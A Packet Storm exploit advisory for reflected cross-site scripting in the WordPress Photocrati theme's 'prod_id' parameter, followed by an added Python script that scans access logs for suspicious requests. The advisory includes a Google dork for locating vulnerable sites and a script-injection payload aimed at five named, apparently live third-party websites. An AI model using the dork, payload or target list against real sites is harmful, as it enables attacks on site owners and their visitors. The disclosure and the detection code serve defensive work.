WordPress Photocrati Cross Site Scripting

2014-01-29T00:00:00
ID PACKETSTORM:124986
Type packetstorm
Reporter ACC3SS
Modified 2014-01-29T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : WordPress Photocrati-theme Cross Site Scripting  
  
# Exploit Author : ACC3SS  
  
# Vendor Homepage : http://www.photocrati.com  
  
# Google Dork : inurl:wp-content/themes/photocrati-theme/photocrati-gallery  
  
# Date : 2014-01-29  
  
# Tested on : Windows 7  
######################  
  
# Location :  
localhost/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=[Xss]  
  
######################  
# Demo :  
  
#  
http://abandonphotography.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://remingtonphotographyohio.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://stephimals.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://justinsweet.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
  
#  
http://riseupgallery.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=  
"/><script>alert(1);</script>  
######################  
`
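
For site owners checking whether this endpoint has been probed, here is a log check that flags requests to the reported ecomm-sizes.php script whose prod_id value is not a plain number. It is an added example, not part of the original advisory or the theme's code; the numeric-ID rule, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter come from the advisory's "Location" line.
VULN_PATH = "/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php"
PARAM = "prod_id"

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate prod_id is a short decimal product number.
BENIGN_VALUE = re.compile(r"[0-9]{1,10}")


def suspicious_prod_id(log_line):
    """Return the decoded prod_id if the request targets the reported
    script with a non-numeric value, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.lower().endswith(VULN_PATH):
        return None
    # parse_qs percent-decodes values; keep_blank_values keeps "prod_id=".
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        if not BENIGN_VALUE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, decoded_value) for every flagged entry."""
    for number, line in enumerate(lines, start=1):
        value = suspicious_prod_id(line)
        if value is not None:
            yield number, value


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2014:10:00:01 +0000] "GET /wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [29/Jan/2014:10:00:07 +0000] "GET /wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=%22/%3E%3Cscript%3Ealert(1)%3B%3C/script%3E HTTP/1.1" 200 540 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/Jan/2014:10:00:09 +0000] "GET /index.php?prod_id=%3Cb%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious prod_id {value!r}")
```

A flagged entry only shows that the endpoint was sent markup; whether the page reflected it unescaped still has to be confirmed against the installed theme version.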